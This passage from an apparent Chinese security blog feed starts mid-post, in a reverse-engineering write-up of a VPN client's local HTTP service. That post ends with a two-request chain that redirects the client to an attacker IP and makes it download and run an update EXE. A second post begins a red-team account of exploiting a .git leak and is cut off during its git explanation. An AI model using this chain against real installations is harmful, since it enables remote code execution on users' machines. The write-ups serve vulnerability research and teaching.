        \u5728\u8fd9\u91cc\u7b2c\u4e8c\u4e2a\u53c2\u6570a2<\/code>\u81f3\u5173\u91cd\u8981\uff08\u5b83\u5728\u6761\u4ef6\u5224\u65ad\u3001\u51fd\u6570\u5165\u53c2\u4e2d\u90fd\u88ab\u4f7f\u7528\u5230\uff09\uff0c\u6240\u4ee5\u6211\u63a5\u7740\u8ddf\u8be5\u51fd\u6570\u7684XREF\uff0c\u627e\u5230\u4f20\u9012\u53c2\u6570v26<\/code>\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u8ddf\u8fdb\u5904\u7406\u8fc7v26<\/code>\u7684\u51fd\u6570\uff0csub_48E2C0<\/code>\u51fd\u6570\u6253\u5f00\u4e86\u4e16\u754c\u7684\u5927\u95e8\uff0c\u6839\u636e\u5176\u51fd\u6570\u7684\u8f93\u51fa\u5b57\u7b26\u4e32\u548c\u4ee3\u7801\uff0c\u6b64\u51fd\u6570\u5927\u6982\u8868\u8fbe\u610f\u601d\u5c31\u662f\u53bb\u89e3\u6790URL\u4e2d\u7684\u8bf7\u6c42\u53c2\u6570\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u6240\u4ee5\uff0c\u8fd9\u91cc\u6211\u5c31\u53ef\u4ee5\u5217\u51fa\u8fd9\u51e0\u4e2a\u53c2\u6570\uff1a<\/p>\n\n
        op\ntoken\ncallback\nguid\n<\/code><\/pre>\n\n
        \u5c06\u53c2\u6570\u5e26\u5165URL\u4e2d\uff0c\u5206\u522b\u52a0\u4e0a123<\/code>\u53c2\u6570\u503c\u53bb\u8bbf\u95ee\uff1a<\/p>\n\n
        https:\/\/127.0.0.1:54530\/?op=123\nhttps:\/\/127.0.0.1:54530\/?token=123\nhttps:\/\/127.0.0.1:54530\/?callback=123\nhttps:\/\/127.0.0.1:54530\/?guid=123\n<\/code><\/pre>\n\n
        \"\"<\/p>\n\n
        \u5982\u4e0a\u56fe\u6240\u793a\uff0c\u8bf7\u6c42\u53c2\u6570callback<\/code>\u6709\u5bf9\u5e94\u7684\u53cd\u56de\u4fe1\u606f\uff0c\u5c1d\u8bd5\u8fdb\u884cXSS\u65e0\u679c\uff0c\u63a5\u7740\u5728IDA\u4e2d\u641c\u7d22callback<\/code>\u5b57\u7b26\u4e32\u627e\u627e\u662f\u5426\u6709\u5bf9\u5e94\u7684\u903b\u8f91\uff0c\u53d1\u73b0\u4e86\u591a\u4e2aURL\u7684\u5730\u5740\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u8fd9\u4e9bURL\u5730\u5740\u8bc1\u660e\u4e86\u53c2\u6570op<\/code>\u3001token<\/code>\u3001callback<\/code>\u53ef\u4ee5\u642d\u914d\u5728\u4e00\u5757\u53bb\u8bf7\u6c42\u4f7f\u7528\uff0c\u6211\u4e8e\u6b64\u5904\u9010\u6e10\u9012\u51cf\u53c2\u6570\u8bbf\u95ee\uff08\u8003\u8651\u5230token<\/code>\u53c2\u6570\u53ef\u80fd\u4f1a\u5b58\u5728\u9274\u6743\u7b49\u64cd\u4f5c\uff09\uff1a<\/p>\n\n
        https:\/\/127.0.0.1:54530\/?op=__restart_ecagent__&token=123&callback=123\nhttps:\/\/127.0.0.1:54530\/?op=__restart_ecagent__&token=123\nhttps:\/\/127.0.0.1:54530\/?op=__restart_ecagent__\n<\/code><\/pre>\n\n
        \u6700\u7ec8\u53d1\u73b0\uff0c\u8fd9\u4e09\u6761\u8bf7\u6c42\u90fd\u53ef\u4ee5\u4f7f\u5f97ECAgent.exe<\/code>\u8fdb\u7a0b\u91cd\u542f\uff0c\u800cop=__stop_ecagent__<\/code>\u5219\u6d4b\u8bd5\u53ef\u4ee5\u505c\u6b62ECAgent.exe<\/code>\u8fdb\u7a0b\u3002<\/p>\n\n
        \u8f93\u5165\u53c2\u6570<\/h4>\n\n
        \u7b80\u5355\u68b3\u7406\u5b8c\u63a5\u53e3\u53c2\u6570\u7684\u5904\u7406\u903b\u8f91\u4e4b\u540e\uff0c\u6211\u5bf9op<\/code>\u503c\u5bf9\u5e94\u7684\u51fd\u6570\u90fd\u770b\u4e86\u4e0b\uff0c\u6709\u5f88\u591a\u51fd\u6570\u65e0\u6cd5\u901a\u8fc7\u9759\u6001\u7684\u65b9\u5f0f\u53bb\u5206\u6790\uff0c\u4f46\u6839\u636e\u5b57\u9762\u610f\u601d\u4e5f\u80fd\u7406\u89e3\u4e2a\u5927\u6982\uff1a<\/p>\n\n
        v7 = \"__check_alive__\";\nv8[0] = (int)sub_48F700;\nv8[1] = (int)\"CheckRelogin\"; \/\/ \u68c0\u67e5\u91cd\u65b0\u767b\u5f55\nv8[2] = (int)sub_4935E0;\nv8[3] = (int)\"DoConfigure\"; \/\/ \u505a\u914d\u7f6e\nv8[4] = (int)sub_490800;\nv8[5] = (int)\"GetConfig\"; \/\/ \u83b7\u53d6\u914d\u7f6e\nv8[6] = (int)sub_48FB30;\nv8[7] = (int)\"InitECAgent\"; \/\/ \u521d\u59cb\u5316ECAgent\nv8[8] = (int)sub_48F720;\nv8[9] = (int)\"GetEncryptKey\"; \/\/ \u83b7\u53d6\u52a0\u5bc6key\nv8[10] = (int)sub_493540;\nv8[11] = (int)\"Setter\";\nv8[12] = (int)sub_493960;\nv8[13] = (int)\"Getter\";\nv8[14] = (int)sub_494190;\nv8[15] = (int)\"__restart_ecagent__\"; \/\/ \u91cd\u542fECAgent\nv8[16] = (int)sub_4903E0;\nv8[17] = (int)\"__stop_ecagent__\"; \/\/ \u505c\u6b62ECAgent\nv8[18] = (int)sub_491510;\nv8[19] = (int)\"DetectECAgent\"; \/\/ \u68c0\u6d4bECAgent\nv8[20] = (int)sub_48F6C0;\n<\/code><\/pre>\n\n
        \u4f46\u6709\u4e9b\u64cd\u4f5c\u80af\u5b9a\u662f\u9700\u8981\u53e6\u5916\u4e00\u4e2a\u53c2\u6570\u53bb\u8d4b\u503c\u914d\u5408\u7684\uff0c\u6240\u4ee5\u6211\u6839\u636e\u4e4b\u524d\u83b7\u53d6\u7684\u53c2\u6570\u5217\u8868\u5728IDA\u4e2d\u641c\u7d22\u5b57\u7b26\u4e32\uff0c\u6211\u53d1\u73b0\u5728\u8fd9\u4e9b\u53c2\u6570\u4e2d\u5939\u6742\u7740\u4e00\u4e2a\u53cc\u5b57dd -> Define Double Word<\/code>\uff0cIDA\u6ca1\u6709\u5c06\u5b83\u76f4\u63a5\u89e3\u6790\u51fa\u6765\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u6211\u9009\u4e2d\u5b83\u6309\u4e0b\u5feb\u6377\u952eA<\/code>\u5c06\u5176\u8f6c\u4e3a\u5b57\u7b26\u4e32\u5f62\u5f0f\uff0c\u5f97\u5230\u4e86\u5b57\u7b26\u4e32arg<\/code>\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u65e2\u7136\u662f\u4e0e\u53c2\u6570\u5728\u4e00\u5757\u7684\uff0c\u90a3\u4e48\u6211\u4e5f\u5c06\u5176\u4f5c\u4e3a\u53c2\u6570\u6dfb\u52a0\u5230URL\u4e2d\uff0c\u5e76\u4e0e\u6dfb\u52a0\u53c2\u6570\u4e4b\u524d\u7684URL\uff0c\u5206\u522b\u8bf7\u6c42\u5bf9\u6bd4\u54cd\u5e94\uff1a<\/p>\n\n
        https:\/\/127.0.0.1:54530\/?op=CheckRelogin\nhttps:\/\/127.0.0.1:54530\/?op=DoConfigure\nhttps:\/\/127.0.0.1:54530\/?op=GetConfig\nhttps:\/\/127.0.0.1:54530\/?op=InitECAgent\nhttps:\/\/127.0.0.1:54530\/?op=GetEncryptKey\n\nhttps:\/\/127.0.0.1:54530\/?op=CheckRelogin&arg=123\nhttps:\/\/127.0.0.1:54530\/?op=DoConfigure&arg=123\nhttps:\/\/127.0.0.1:54530\/?op=GetConfig&arg=123\nhttps:\/\/127.0.0.1:54530\/?op=InitECAgent&arg=123\nhttps:\/\/127.0.0.1:54530\/?op=GetEncryptKey&arg=123\n<\/code><\/pre>\n\n
        CheckRelogin\uff0c\u6dfb\u52a0\u524d\u63d0\u793ainvalid param count<\/code>\uff0c\u6dfb\u52a0\u540e\u5c31\u4e0d\u63d0\u793a\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        DoConfigure\uff0c\u6dfb\u52a0\u524d\u8fd4\u56de\u4e3a\u7a7a\uff0c\u6dfb\u52a0\u540e\u8fd4\u56de\u6709\u5185\u5bb9\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        GetConfig\uff0c\u6dfb\u52a0\u524d\u8fd4\u56de\u6709\u5185\u5bb9\uff0c\u6dfb\u52a0\u540e\u8fd4\u56de\u4e3a\u7a7a\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        InitECAgent\uff0c\u6dfb\u52a0\u524d\u8fd4\u56de\u4e3a\u7a7a\uff0c\u6dfb\u52a0\u540e\u8fd4\u56de\u6709\u5185\u5bb9\uff0c\u5e76\u63d0\u793aCSCM_EXIST, init ok<\/code>\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        GetEncryptKey\uff0c\u6dfb\u52a0\u524d\u540e\u8fd4\u56de\u5185\u5bb9\u6ca1\u6709\u53d8\u5316\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u6839\u636e\u5bf9\u6bd4\uff0c arg<\/code>\u786e\u5b9e\u53ef\u4ee5\u4f5c\u4e3a\u53c2\u6570\u53bb\u8bf7\u6c42\uff0c\u4f46\u5177\u4f53\u662f\u4ec0\u4e48\u610f\u4e49\uff0c\u8fd8\u9700\u8981\u53bb\u770b\u529f\u80fd\u5b9e\u73b0\uff0c\u7531\u4e8e\u6211\u6c34\u5e73\u6709\u9650\uff0c\u5728\u9605\u8bfb\u9759\u6001\u4ee3\u7801\u65f6\u9047\u5230\u5f88\u591a\u574e\uff0c\u6240\u4ee5\u6839\u636e\u81ea\u5df1\u7684\u5927\u6982\u7406\u89e3\uff0c\u5224\u65ad\u51fa\u8be5\u7a0b\u5e8f\u4f1a\u8f93\u51faLog\u65e5\u5fd7\u3002<\/p>\n\n
        \"\"<\/p>\n\n
        \u4e8e\u662f\u5728\u78c1\u76d8\u6587\u4ef6\u4e2d\u53bb\u5bfb\u627eLog\u6587\u4ef6\uff0c\u6700\u7ec8\u5728C:\\Users\\chen\\AppData\\Roaming\\XXX\\SSL\\Log<\/code>\u4e2d\u627e\u5230\u4e86\u8f93\u51fa\u65e5\u5fd7\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
        \u6839\u636eECAgent.exe.log<\/code>\u65e5\u5fd7\u8bb0\u5f55\u53ef\u4ee5\u770b\u51fa\u7a0b\u5e8f\u5904\u7406\u7684\u903b\u8f91\uff1a<\/p>\n\n
        \"\"<\/p>\n\n
          \n  
        1. CheckRelogin\u5bf9arg\u53c2\u6570\u8fdb\u884c\u4e86\u89e3\u5bc6\uff1b<\/li>\n  
        2. GetConfig\u6839\u636earg\u53c2\u6570\u8fdb\u884c\u8bfb\u53d6\u914d\u7f6e\uff1b<\/li>\n  
        3. InitECAgent\u6839\u636earg\u53c2\u6570\u914d\u7f6e\u4e86VPN\u5730\u5740\uff08HTTPS\uff09\u3002<\/li>\n<\/ol>\n\n
          CheckRelogin\u89e3\u5bc6\u6b63\u597d\u5bf9\u5e94\u7740GetEncryptKey\u7684\u8fd4\u56de\u52a0\u5bc6\u4fe1\u606f\uff0c\u4e8e\u662f\u5c1d\u8bd5\u5e26\u5165\u5e76\u6839\u636e\u65e5\u5fd7\u53d1\u73b0\u8bb0\u5f55\u7684\u4fe1\u606f\u4e0d\u4e00\u6837\u4e86\uff0c\u6240\u4ee5\u5728\u8fd9\u91cc\u6211\u6682\u65f6\u5c06\u5176\u6401\u7f6e\uff1a<\/p>\n\n
          \"\"<\/p>\n\n
          \u63a5\u7740\u6765\u770b\u914d\u7f6eVPN\u5ba2\u6237\u7aef\u7684\u670d\u52a1\u5730\u5740\uff0c\u5c1d\u8bd5\u8bf7\u6c42\u5982\u4e0b\u5730\u5740\uff0c\u5c06\u670d\u52a1\u5668\u5730\u5740\u6307\u5411\u6211\u7684\u673a\u5668\uff1a<\/p>\n\n
          https:\/\/127.0.0.1:54530\/?op=InitECAgent&arg=172.20.10.3\n<\/code><\/pre>\n\n
          \u968f\u540e\u53bb\u8bf7\u6c42\u5176\u4ed6op<\/code>\u53c2\u6570\u503c\u7684\u5730\u5740\uff0c\u5076\u7136\u95f4\u53d1\u73b0\u8bf7\u6c42\u5982\u4e0b\u5730\u5740\uff08GetConfig\u7684arg\u53c2\u6570\u4e3a0\u6216\u5b57\u7b26\u4e32\uff09\uff1a<\/p>\n\n
          https:\/\/127.0.0.1:54530\/?op=GetConfig&arg=abc\n<\/code><\/pre>\n\n
          VPN\u5ba2\u6237\u7aef\u4f1a\u53bb\u8bf7\u6c42https:\/\/172.20.10.3\/com\/WindowsModule.xml<\/code>\uff0c\u5982\u4e0b\u56fe\u6240\u793a\u5c31\u662f\u5ba2\u6237\u7aef\u8bf7\u6c42\u670d\u52a1\u7aef\u7684HTTP\u65e5\u5fd7\uff1a<\/p>\n\n
          \"\"<\/p>\n\n
          \u5e76\u4e14\u4f1a\u5c06\u8be5\u6587\u4ef6\u7684XML\u683c\u5f0f\u8f6c\u4e3aJSON\u683c\u5f0f\u8f93\u51fa\uff1a<\/p>\n\n
          \"\"<\/p>\n\n
          \u5176\u4ed6\u52a8\u4f5c<\/h4>\n\n
          \u6309\u7167\u6b63\u5e38\u903b\u8f91\u6765\u8bf4\uff0c\u65e2\u7136\u53ef\u4ee5\u8fdc\u7a0b\u8bfb\u53d6\u670d\u52a1\u5668\u914d\u7f6e\uff0c\u5e94\u8be5\u4f1a\u6709\u4e00\u4e9b\u5176\u4ed6\u7684\u64cd\u4f5c\uff0c\u4f8b\u5982\u66f4\u65b0\u3001\u4e0b\u8f7d\uff0c\u4e8e\u662f\u6211\u5728IDA\u4e2d\u7ee7\u7eed\u5bfb\u627e\uff0c\u53d1\u73b0\u4e86\u4e00\u6bb5\u5b57\u7b26\u4e32\uff1a<\/p>\n\n
          \"\"<\/p>\n\n
          v23 = \"__check_alive__|GetEncryptKey|DoConfigure#SET LANG|DoQueryService#QUERY LANG|InitECAgent|CheckRelogin|Logout|CheckMITMAttack|SelectLines|DetectECAgent|CheckProxySetting|UpdateControls#BEFORELOGIN|DoQueryService#QUERY CONTROLS UPDATEPROCESS|DoQueryService#QUERY DKEY_DETECT|DoQueryService#QUERY LOGINSTATUS|OpenBrowser|StartEasyConnect|DoQueryService#QUERY NEEDUPDATE\";\n<\/code><\/pre>\n\n
          \u5728\u8be5\u5b57\u7b26\u4e32\u4e2d\u8bb8\u591a\u4e4b\u524d\u53d1\u73b0\u7684\u90fd\u5b58\u5728\u5176\u4e2d\uff0c\u5f53\u7136\u4e5f\u6709\u5f88\u591a\u6ca1\u6709\u89c1\u8fc7\u7684\uff0c\u6211\u68b3\u7406\u4e86\u4e00\u4e0b\u6ca1\u6709\u89c1\u8fc7\u7684\u5b57\u7b26\u4e32\uff1a<\/p>\n\n
          DoConfigure#SET LANG\nDoQueryService#QUERY LANG\nLogout\nCheckMITMAttack\nSelectLines\nCheckProxySetting\nUpdateControls#BEFORELOGIN\nDoQueryService#QUERY CONTROLS UPDATEPROCESS\nDoQueryService#QUERY DKEY_DETECT\nDoQueryService#QUERY LOGINSTATUS\nOpenBrowser\nStartEasyConnect\nDoQueryService#QUERY NEEDUPDATE\n<\/code><\/pre>\n\n
          \u5f88\u5947\u602a\u7684\u662f\u8fd9\u4e9b\u5b57\u7b26\u4e32\u4e4b\u540e\u8fd8\u6709\u4e00\u4e2a#<\/code>\u53f7\uff0c\u4f8b\u5982DoConfigure<\/code>\uff0c\u6309\u7167\u6211\u7684\u63a8\u6d4b\u662f\u53bb\u8bbe\u7f6e\u914d\u7f6e\u4fe1\u606f\u7684\uff0c\u6b64\u5904\u540e\u9762\u8ddf\u4e86\u4e00\u4e2a#<\/code>\u53f7+SET LANG<\/code>\uff0c\u6839\u636e\u5b57\u9762\u610f\u601d\u7b2c\u4e00\u65f6\u95f4\u60f3\u5230\u4e86\u8fd9\u53ef\u80fd\u662f\u8bbe\u7f6e\u8bed\u8a00\uff0c\u4f46\u5982\u4f55\u8bbe\u7f6e\uff1f\u5c1d\u8bd5\u4e86\u4e00\u4e0b\uff0c\u6b64\u5904\u53ef\u4ee5\u5e26\u8fdbarg<\/code>\u53c2\u6570\uff0c\u6309\u7167\u5b57\u9762\u610f\u601dSET LANG<\/code>\u4e4b\u540e\u5e94\u8be5\u8fd8\u9700\u8981\u6709\u53c2\u6570\u503c\uff0c\u6240\u4ee5\u8bf7\u6c42\u53c2\u6570\u503c\u6539\u4e3aSET LANG 123<\/code>\uff0c\u63a5\u7740\u6309\u7167\u5b57\u9762\u610f\u601d\u53d1\u73b0\u914d\u5408DoQueryService#QUERY LANG<\/code>\u53ef\u4ee5\u67e5\u8be2\u51fa\u6765\uff1a<\/p>\n\n
          \"\"<\/p>\n\n
          \u540c\u6837\uff0c\u6211\u5728\u4e4b\u524d\u7684\u53d1\u73b0\u4e2d\u53d1\u73b0\u53ef\u4ee5\u53bb\u914d\u7f6eVPN\u670d\u52a1IP\u5730\u5740\uff0c\u5728IP\u4e4b\u540e\u52a0\u4e0a\u7a7a\u683c\u4e5f\u53ef\u4ee5\u914d\u7f6e\u6307\u5b9a\u7aef\u53e3\uff1a<\/p>\n\n
          https:\/\/127.0.0.1:54530\/?op=InitECAgent&arg=172.20.10.3 443\n<\/code><\/pre>\n\n
          \u8fdc\u7a0b\u4e0b\u8f7d\uff08RCE\uff09<\/h3>\n\n
          \u63a5\u7740\u6765\u770b\u6211\u6700\u5173\u5fc3\u7684UpdateControls#BEFORELOGIN<\/code>\uff0c\u5176\u5b57\u9762\u610f\u601d\u5c31\u662f\u5728\u767b\u9646\u524d\u8fdb\u884c\u66f4\u65b0\uff0c\u90a3\u4e48\u5177\u4f53\u66f4\u65b0\u4e86\u4ec0\u4e48\u5462\uff1f\u6211\u5c1d\u8bd5\u8bf7\u6c42\u5982\u4e0bURL\u5e76\u67e5\u770b\u662f\u5426\u5b58\u5728\u7f51\u7edc\u7684\u8fde\u63a5\uff08\u9700\u8981\u5148\u8bf7\u6c42InitECAgent\uff09\uff1a<\/p>\n\n
          https:\/\/127.0.0.1:54530\/?op=UpdateControls&arg=BEFORELOGIN\n<\/code><\/pre>\n\n
          \u5728HTTP\u670d\u52a1\u7aef\u6210\u529f\u7684\u6536\u5230\u4e86\u8bf7\u6c42\u65e5\u5fd7\uff0c\u53ef\u4ee5\u770b\u89c1\u5ba2\u6237\u7aef\u8bf7\u6c42\u4e86\u5f88\u591a\u4e2a\u8def\u5f84\uff0c\u5e76\u4ee5POST\u5f62\u5f0f\u8bf7\u6c42\u4e86\/com\/win\/XXXUD.exe<\/code>\u6587\u4ef6\uff1a<\/p>\n\n
          \"\"<\/p>\n\n
          \u7ecf\u8fc7\u6d4b\u8bd5\u53d1\u73b0\u5176\u4f1a\u53bb\u4e3b\u52a8\u4e0b\u8f7d\u8be5EXE\u5e76\u66ff\u6362\u539fXXXUD.exe\u6587\u4ef6\uff0c\u63a5\u7740\u6267\u884c\u6253\u5f00\uff1a<\/p>\n\n
          \"\"<\/p>\n\n
          \u5c31\u8fd9\u6837\u6211\u6210\u529f\u53d1\u73b0\u4e86\u4e00\u6761RCE\u94fe\uff1a<\/p>\n\n
          \/\/ \u6539\u53d8VPN\u5ba2\u6237\u7aef\u670d\u52a1\u7684IP\u5730\u5740\u548c\u7aef\u53e3\nhttps:\/\/127.0.0.1:54530\/?op=InitECAgent&arg=172.20.10.3 443\n\/\/ \u8ba9VPN\u5ba2\u6237\u7aef\u53d1\u8d77\u4e0b\u8f7d\u66f4\u65b0\uff0c\u5e76\u6267\u884c\u66f4\u65b0\u6587\u4ef6\nhttps:\/\/127.0.0.1:54530\/?op=UpdateControls&arg=BEFORELOGIN\n<\/code><\/pre>\n\n
          \u6587\u672b<\/h2>\n\n
          \u6211\u5728\u771f\u5b9e\u9006\u5411\u8fc7\u7a0b\u4e2d\u8e29\u4e86\u5f88\u591a\u5751\uff0c\u4e5f\u7531\u4e8e\u81ea\u8eab\u7f3a\u5c11\u9006\u5411\u7ecf\u9a8c\u548c\u5f3a\u6709\u529b\u7684\u6c34\u51c6\uff0c\u53ea\u80fd\u6a21\u62df\u9ed1\u76d2\u7684\u7ecf\u9a8c\u548c\u5957\u8def\u5e26\u5165\u5230\u9006\u5411\u4e2d\u3002<\/p>\n\n
          \u867d\u7136\u8fd9\u53ea\u662f\u4e00\u6b21\u9006\u5411\u6316\u6398\u6a21\u62df\uff0c\u4f46\u5728\u8fd9\u8fc7\u7a0b\u4e2d\u6211\u638c\u63e1\u4e86\u4e4b\u524d\u9ed1\u76d2\u6240\u65e0\u6cd5\u77e5\u6653\u7684\u7ec6\u8282\uff0c\u5e76\u4e14\u5bf9\u6bd4\u9ed1\u3001\u767d\u76d2\u7684\u8fc7\u7a0b\u548c\u7ed3\u679c\uff0c\u4f1a\u53d1\u73b0\u9006\u5411\u4fa7\u6700\u540e\u5b9e\u9645\u7684PoC\u6839\u672c\u4e0d\u9700\u8981\/ECAgent\/<\/code>\u76ee\u5f55\uff0carg1<\/code>\u53c2\u6570\u4e5f\u53d8\u6210\u4e86arg<\/code>\u53c2\u6570\uff0c\u5e76\u4e14RCE\u94fe\u7684\u8bf7\u6c42\uff0c\u4ece\u539f\u672c\u76843\u6761\u8bf7\u6c42\u53d8\u6210\u4e862\u6761\u8bf7\u6c42\u3002\uff08\u4e5f\u8bb8\u53ef\u4ee5Bypass\u4e00\u4e9bWAF\uff09<\/p>\n\n
          \u6700\u540e\u6211\u5c06\u8fd9\u7c7b\u6f0f\u6d1e\u79f0\u4e4b\u4e3aWeb2Pwn\uff0c\u4e5f\u5c31\u662f\u57fa\u4e8eWeb\u901a\u9053\u8fbe\u5230\u5e94\u7528\u4fa7\uff08\u975eWeb\uff09\u6f0f\u6d1e\u89e6\u53d1\u7684\u76ee\u7684\u3002\u4f8b\u5982\u4f60\u53ef\u4ee5\u901a\u8fc7HTTP\u670d\u52a1\u8bbf\u95ee\u89e6\u53d1\u6267\u884cCreateProcess\u51fd\u6570\uff0c\u4ea6\u6216\u8005\u901a\u8fc7HTTP\u670d\u52a1\u8bbf\u95ee\u89e6\u53d1\u6ea2\u51fa\u6f0f\u6d1e\u3002<\/p>\n","pubDate":"2021-05-05T00:00:00+08:00","link":"https:\/\/gh0st.cn\/archives\/2021-05-05\/1","guid":"https:\/\/gh0st.cn\/archives\/2021-05-05\/1"},{"title":"\u8bb0\u4e00\u6b21\u653b\u9632\u6f14\u4e60\u6e17\u900f\u8fc7\u7a0b","description":"
          \u8bb0\u4e00\u6b21\u653b\u9632\u6f14\u4e60\u6e17\u900f\u8fc7\u7a0b<\/h1>\n\n
          \u524d\u8a00<\/h2>\n\n
          \u8bb0\u5f55\u4e00\u6b21\u653b\u9632\u6f14\u4e60\u6e17\u900f\u8fc7\u7a0b\uff0c\u6587\u7ae0\u4ec5\u5199\u5173\u4e8e\u300c\u6253\u70b9\u300d\u73af\u8282\u7684\u90e8\u5206\uff0c\u4e5f\u5c31\u662f\u62ff\u5230\u9776\u6807\u7684Webshell\u4e3a\u6b62\u3002<\/p>\n\n
          \u4efb\u52a1: \u62ff\u5230XXX\u4e1a\u52a1\u7cfb\u7edf\u6743\u9650\u2026<\/p>\n\n
          \u8fc7\u7a0b<\/h2>\n\n
          \u9776\u6807\u662f\u4e00\u4e2awww\u7684\u57df\u540d\uff0c\u7b80\u5355\u770b\u4e86\u4e0b\u6709\u673a\u4f1a\u786c\u5543\uff08\u5546\u4e1a\u6e90\u7801\uff09\uff0c\u4f46\u65f6\u95f4\u4e0d\u591a\uff0c\u5148\u627e\u627e\u8106\u5f31\u70b9\uff0c\u5e38\u89c4\u4e00\u5957\u6d41\u7a0b\uff0c\u6536\u96c6\u5b50\u57df\u3001C\u6bb5\u2026<\/p>\n\n
          \u8106\u5f31\u70b9\u53d1\u73b0<\/h3>\n\n
          \u5728\u5bf9\u5b50\u57df\u7684\u5e38\u89c4\u626b\u63cf\u540e\uff0c\u53d1\u73b0\u5b58\u5728.git<\/code>\u6cc4\u9732:<\/p>\n\n
          \"-w494\"<\/p>\n\n
          \u4ee5\u53ca\u53d1\u73b0\u4e86phpMyAdmin<\/code>\u5e94\u7528\u548c\u4e00\u4e9bphpinfo()<\/code>\u4fe1\u606f\u6cc4\u6f0f:<\/p>\n\n
          \"-w865\"<\/p>\n\n
          \u770b\u5230\u8fd9\u4e9b\uff0c\u4e0d\u7531\u5f97\u5174\u594b\u4e86\u8d77\u6765\uff0c\u63a5\u4e0b\u6765\u53ea\u8981\u6309\u7167\u9884\u671f\u7684\u60f3\u6cd5: \u901a\u8fc7.git<\/code>\u62ff\u5230\u6570\u636e\u5e93\u8d26\u53f7\u5bc6\u7801\uff08\u6e90\u7801\u4e2d\u4e00\u822c\u4f1a\u6709\uff09\uff0c\u767b\u5f55phpMyAdmin<\/code>\uff0c\u7136\u540e\u62ff\u5230Webshell<\/code>\u2026<\/p>\n\n
          \u4f46\u2026\u8f6c\u6298\u70b9\u6765\u4e86\uff0c\u5c1d\u8bd5\u4f7f\u7528GitHack<\/code>\u7b49\u4e00\u7cfb\u5217\u5e38\u89c1\u5de5\u5177\u53bb\u6062\u590d.git<\/code>\uff0c\u53d1\u73b0\u6062\u590d\u7684\u6587\u4ef6\u53ea\u6709\u4e00\u4e9b\u56fe\u7247\uff0c\u770bLogs<\/code>\u53d1\u73b0\u6709\u5f88\u591a\u6587\u4ef6\u6062\u590d\u5931\u8d25\uff0c\u65e2\u7136\u4e0d\u80fd\u5f53\u4e00\u4e2aScriptKid<\/code>\u4e00\u628a\u68ad\u54c8\uff0c\u90a3\u5c31\u81ea\u5df1\u6765\u624b\u52a8\u6062\u590d\u5427~<\/p>\n\n
          Git\u539f\u7406\u4e0e\u6062\u590d<\/h3>\n\n
          \u57fa\u672c\u6982\u5ff5<\/strong><\/p>\n\n
          Git\u6709\u4e09\u4e2a\u6982\u5ff5\u8bcd\u9700\u8981\u4e86\u89e3: 1.\u5de5\u4f5c\u533a 2.\u7248\u672c\u5e93 3.\u6682\u5b58\u533a<\/p>\n\n
          \u5de5\u4f5c\u533a\u5c31\u662f\u6b63\u5e38\u7684\u76ee\u5f55\uff08\u4f60\u7684\u9879\u76ee\u4f4d\u7f6e\uff09;\u7248\u672c\u5e93\u5c31\u662f\u5728\u5de5\u4f5c\u533a\u5185\u7684\u4e00\u4e2a\u9690\u85cf\u76ee\u5f55.git<\/code>;\u5982\u679c\u4f60\u66fe\u7ecf\u6ce8\u610f\u8fc7\u8fd9\u4e2a\u76ee\u5f55\u4f60\u4f1a\u53d1\u73b0\u91cc\u9762\u6709\u8bb8\u591a\u4e1c\u897f\uff0c\u5728\u8be5\u76ee\u5f55\u4e0b\u4f1a\u5b58\u5728\u4e00\u4e2aindex<\/code>\u6587\u4ef6\uff0c\u8fd9\u88ab\u79f0\u4e4b\u4e3a\u6682\u5b58\u533a\u3002<\/p>\n\n
          \u9664\u4ee5\u4e0a\u6240\u8ff0\u4e4b\u5916\uff0c\u5927\u5bb6\u90fd\u77e5\u9053\u6bcf\u4e00\u4e2aGit\u9879\u76ee\u90fd\u4f1a\u6709\u4e00\u4e2a\u9ed8\u8ba4\u7684\u5206\u652fmaster<\/code>\uff0c\u5728.git<\/code>\u76ee\u5f55\u4e0b\u6709\u4e00\u4e2a\u6587\u4ef6head<\/code>\uff0c\u5b83\u7528\u6765\u6307\u5411master<\/code>\u8fd9\u4e2a\u5206\u652f\u3002<\/p>\n\n
          \"-w992\"<\/p>\n\n
          \u5f53\u6211\u4eec\u4f7f\u7528git add<\/code>\u65f6\uff0c\u5b9e\u9645\u4e0a\u5c31\u662f\u628a\u6587\u4ef6\u6dfb\u52a0\u8fdb\u6682\u5b58\u533a\uff1b\u4f7f\u7528git commit<\/code>\u65f6\uff0c\u624d\u4f1a\u628a\u6682\u5b58\u533a\u7684\u5185\u5bb9\u6dfb\u52a0\u5230\u5f53\u524d\u5206\u652f\uff0c\u9ed8\u8ba4\u662fmaster<\/code>\u5206\u652f\u3002<\/p>\n\n
          \u6211\u4eec\u53ef\u4ee5\u6765\u5b9e\u9645\u7684\u770b\u4e00\u4e0bindex<\/code>\u548chead<\/code>\u8fd9\u4e24\u4e2a\u6587\u4ef6:<\/p>\n\n
          \"-w1108\"<\/p>\n\n
          \u4f7f\u7528Binwalk<\/code>\u76f4\u63a5\u5206\u6790\uff0c\u53ef\u4ee5\u5f88\u76f4\u89c2\u7684\u770b\u89c1index<\/code>\u5185\u6709\u8bb8\u591a\u5185\u5bb9\uff0chead<\/code>\u5e76\u6ca1\u6709\uff0c\u76f4\u63a5cat head<\/code>\u53d1\u73b0\u8fd9\u5c31\u662f\u4e00\u4e2a\u5355\u7eaf\u7684\u6587\u672c\u5185\u5bb9:<\/p>\n\n
          ref: refs\/heads\/master\n<\/code><\/pre>\n\n
          \u524d\u9762\u4e86\u89e3\u5230\u8fd9\u662f\u4e00\u4e2a\u5206\u652f\u6307\u5411\uff0c\u90a3\u6211\u76f4\u63a5\u67e5\u770b.git<\/code>\u76ee\u5f55\u4e0b\u7684refs\/heads\/master<\/code>\u6587\u4ef6\uff0c\u5f97\u5230\u4e00\u4e32Hash\u503c\u3002<\/p>\n\n
          \u6211\u4eec\u53ef\u4ee5\u6682\u4e14\u8ba4\u4e3a\u8fd9\u662fmaster<\/code>\u5206\u652f\u7684\u4e00\u4e2a\u8bb0\u5f55\uff0c\u7528\u4e8e\u533a\u5206\u3001\u6bd4\u8f83\u3002<\/p>\n\n
